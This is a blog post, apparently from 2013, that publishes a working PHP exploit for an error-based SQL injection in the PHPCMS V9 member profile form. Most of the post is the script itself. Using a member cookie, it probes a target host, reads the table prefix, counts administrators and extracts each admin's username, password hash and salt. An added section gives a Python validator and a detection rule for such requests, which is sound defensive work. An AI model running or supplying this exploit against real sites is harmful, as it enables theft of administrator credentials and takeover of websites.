
PHPCMS V9 info[birthday] injection EXP


The member profile edit page in the PHPCMS V9 member center does not handle its input properly, which leads to a SQL injection vulnerability. It seems to have been posted on T00LS first and was later reposted to WooYun; the vendor has already patched it, so users of this CMS should upgrade as soon as possible. Many experts probably have an EXP already, but I have not seen anyone publish one. I have only just started learning PHP and wrote this one as an exercise; it still has some small problems, and I hope the experts can help improve it.

How to use:

1. Register a member account first, log in to obtain a cookie, paste it into the cookie variable, then run the script.

2. If you get no data back, change the User-Agent to your own.

The exploit code is as follows:

<?php
/**
 * Created by 独自等待
 * User: Hack2012
 * Date: 13-2-17 7:08 PM
 * FileName: phpcmsv9_info.php
 * 独自等待's blog: www.waitalone.cn
 */
print_r('
+------------------------------------------------------+
            PHPCMS_V9 info[birthday] 注入EXP
             Site:http://www.waitalone.cn/
                Exploit BY: 独自等待
                  Time:2013-02-17
+------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path to phpcms
Example: php ' . $argv[0] . ' localhost /phpcms
+------------------------------------------------------+
    ');
    exit;
}
error_reporting(7);
$host = $argv[1];
$path = $argv[2];
// Replace this with the cookie of your own logged-in member account first
$cookie = 'Zopvm_siteid=Yw%3D%3D; Zopvm_admin_email=ISZUBBoqExIJbBFeIg%3D%3D; Zopvm_sys_lang=KC8fAjQ%3D; Zopvm_admin_username=ISZUBA%3D%3D; Zopvm_userid=YA%3D%3D; IBW_AreaId=0; Zopvm__nickname=JiJBFQ%3D%3D; Zopvm_auth=EwBdKQw1BiY0ExF2DDtqCB5nEHQQAWg7DT40IDkDBmMOGnETEHALYgcWXSIPLk9J; Zopvm__userid=Yw%3D%3D; Zopvm__username=ISZUBA%3D%3D; Zopvm__groupid=YA%3D%3D; bdshare_firstime=1369108099451; PHPSESSID=5ujcv74lgvh9l3qof5gmghhij0';
// Start the timer
$start_time = func_time();
// Probe request: the injected SQL lives in the info[] array key, and the technique only works
// when the MySQL error text is echoed back in the response
$cmd1 = 'nickname=safe&info%5Bbirthday%3D%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+distinct+concat%280x23%2Ccount(*)%2C0x23%29+FROM+v9_admin+Order+by+userid+LIMIT+0%2C1%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%5D=2013-02-01&dosubmit=%E6%8F%90%E4%BA%A4';
// Each response is fetched once and reused instead of re-sending the same request for every regex
$resp1 = send_pack($cmd1);
//echo $resp1;exit;
if (preg_match('/MySQL Query/', $resp1)) {
    // Read the table prefix out of the error message and derive the admin table name
    preg_match('/\.`(.*?)_member_detail`/', $resp1, $prefix_match);
    $tableadmin = $prefix_match[1] . '_admin';
    // Count the administrators
    $cmd2 = 'nickname=safe&info%5Bbirthday%3D%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+distinct+concat%280x23%2Ccount(*)%2C0x23%29+FROM+' . $tableadmin . '+Order+by+userid+LIMIT+0%2C1%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%5D=2013-02-01&dosubmit=%E6%8F%90%E4%BA%A4';
    $resp2 = send_pack($cmd2);
    preg_match('/\'#(\d+)#1/U', $resp2, $num_match);
    // Fall back to 0 when the count could not be read, so the loop below is skipped cleanly
    $count = isset($num_match[1]) ? (int)$num_match[1] : 0;
    echo '共有' . $count . '个管理员' . "\n";
    // Read each administrator's username, password hash and salt
    if ($count > 0 && preg_match('/Duplicate/', $resp2)) {
        foreach (range(0, ($count - 1)) as $i) {
            $payload = 'nickname=test&info%5Bbirthday%3D%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+distinct+concat%280x23%2Cusername%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%2C0x23%29+FROM+' . $tableadmin . '+Order+by+userid+LIMIT+' . $i . '%2C1%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%5D=2013-02-08&dosubmit=%E6%8F%90%E4%BA%A4';
            $resp = send_pack($payload);
            preg_match('/\'#(.*)#1/U', $resp, $admin_match);
            if (preg_match('/charset=utf-8/', $resp)) {
                // Convert to GBK so the result displays correctly on a Chinese Windows console
                echo $i . '-->' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
            } else {
                echo $i . '-->' . $admin_match[1] . "\n";
            }
            //echo $admin_match[1]. "\n";
            //echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
            //echo mb_convert_encoding($admin_match[1],'gbk','auto')."\n";
        }
    }
    // foreach is faster than the equivalent for loop
//    if (preg_match('/Duplicate/', send_pack($cmd2))) {
//        for ($i = 0; $i < $count; $i++) {
//            $payload = 'nickname=test&info%5Bbirthday%3D%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+distinct+concat%280x23%2Cusername%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%2C0x23%29+FROM+' . $tableadmin . '+Order+by+userid+LIMIT+' . $i . '%2C1%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%5D=2013-02-08&dosubmit=%E6%8F%90%E4%BA%A4';
//            preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
//            if (preg_match('/charset=utf-8/', send_pack($payload))) {
//                echo $i . '-->' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
//            } else {
//                echo $i . '-->' . $admin_match[1] . "\n";
//            }
//        }
//    }
} else {
    exit("报告大人,网站不存在此漏洞,你可以继续秒下一个!\n");
}

// Send one raw HTTP POST to the profile-update action and return the full response
function send_pack($cmd)
{
    global $host, $path, $cookie;
    $data = "POST " . $path . "/index.php?m=member&c=index&a=account_manage_info&t=1 HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Referer: http://" . $host . $path . "/index.php?m=member&c=index&a=account_manage_info&t=1\r\n";
    $data .= "Cookie: " . $cookie . "\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: " . strlen($cmd) . "\r\n\r\n";
    $data .= $cmd . "\r\n";
    $fp = @fsockopen($host, 80, $errno, $errstr, 30);
    //echo ini_get('default_socket_timeout');//the default timeout is 60 seconds
    if (!$fp) {
        echo $errno . '-->' . $errstr;
        exit('Could not connect to: ' . $host);
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}

// Timing helper: current time in seconds with microsecond precision
function func_time()
{
    list($microsec, $sec) = explode(' ', microtime());
    return $microsec + $sec;
}

echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒';
?>
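From the defender's side, two things in the script above are worth noting: the payloads put the SQL inside the name of the info[] array element (the key becomes `birthday=(select ...)`, while the value stays a harmless date), and the whole technique depends on the MySQL error text (`MySQL Query`, `Duplicate entry`) being echoed back in the HTTP response. The Python below is an added example and is not code from the original post or from PHPCMS. It parses a urlencoded body the way PHP does, rejects info[] sub-keys that are not allow-listed identifiers and birthday values that are not real dates, and separately flags parameter names that carry SQL tokens, as a WAF or request-log rule would. The allow-list ALLOWED_INFO_FIELDS, the function names and the two benign bodies are constructed for the demo; the injected sample is the post's own $cmd1 payload.

```python
import re
from datetime import date
from urllib.parse import parse_qsl

# Sub-keys the profile form is allowed to submit under info[...].
# Constructed for this demo; PHPCMS's real column list may differ.
ALLOWED_INFO_FIELDS = {"birthday", "sex", "qq", "email"}

# name[subkey] is the shape PHP turns into $_POST['name']['subkey']
ARRAY_KEY_RE = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)\[([^\]]*)\]$")
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
# SQL tokens that have no business inside a parameter *name*
SQL_IN_KEY_RE = re.compile(r"\b(select|union|from|concat|floor|rand|group\s+by)\b", re.I)

# Constructed sample bodies: a normal profile update and one with an impossible date
BENIGN_BODY = "nickname=safe&info%5Bbirthday%5D=2013-02-01&dosubmit=1"
BAD_DATE_BODY = "nickname=safe&info%5Bbirthday%5D=2013-02-30&dosubmit=1"
# The post's own $cmd1 payload, reused unchanged as the malicious sample
INJECTED_BODY = (
    "nickname=safe&info%5Bbirthday%3D%28select+1+from%28select+count%28*%29%2Cconcat"
    "%28%28select+%28select+%28SELECT+distinct+concat%280x23%2Ccount(*)%2C0x23%29+FROM"
    "+v9_admin+Order+by+userid+LIMIT+0%2C1%29%29+from+information_schema.tables+limit"
    "+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by"
    "+x%29a%29%5D=2013-02-01&dosubmit=%E6%8F%90%E4%BA%A4"
)


def parse_php_form(body):
    """Split a urlencoded body the way PHP does: a[b]=v becomes nested['a']['b'] = v."""
    flat, nested = {}, {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = ARRAY_KEY_RE.match(key)
        if m:
            nested.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            flat[key] = value
    return flat, nested


def validate_info(info):
    """Server-side fix: field names must be allow-listed identifiers, birthday a real date.

    Returns a list of problems; an empty list means the update may proceed.
    """
    problems = []
    for field, value in info.items():
        if not IDENT_RE.match(field) or field not in ALLOWED_INFO_FIELDS:
            problems.append("unexpected field name: %r" % field[:40])
            continue
        if field == "birthday":
            try:
                date.fromisoformat(value)
            except ValueError:
                problems.append("birthday is not a valid YYYY-MM-DD date: %r" % value)
    return problems


def detect_sql_in_keys(body):
    """Detection-side rule (WAF or request-log review): parameter names carrying SQL tokens."""
    return [key[:60] for key, _ in parse_qsl(body, keep_blank_values=True)
            if SQL_IN_KEY_RE.search(key)]


def check_request(body):
    """Run the validation and the detection rule on one body and return both results."""
    _, nested = parse_php_form(body)
    return {
        "validation": validate_info(nested.get("info", {})),
        "detections": detect_sql_in_keys(body),
    }


if __name__ == "__main__":
    samples = [("benign", BENIGN_BODY), ("bad date", BAD_DATE_BODY), ("injected", INJECTED_BODY)]
    for name, body in samples:
        print(name, check_request(body))
```

Suppressing database error output removes the error-based oracle the script relies on, but not the injection itself; the allow-list on field names (or building the UPDATE from a fixed column list rather than from the submitted keys) is the actual fix, and the detection rule is only there to spot attempts in traffic.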

phpcms info[birthday] injection

There is currently 1 visitor comment:

  1. skysheep
    2013-05-22 23:53

    Bug hunter passing by. Thumbs up.
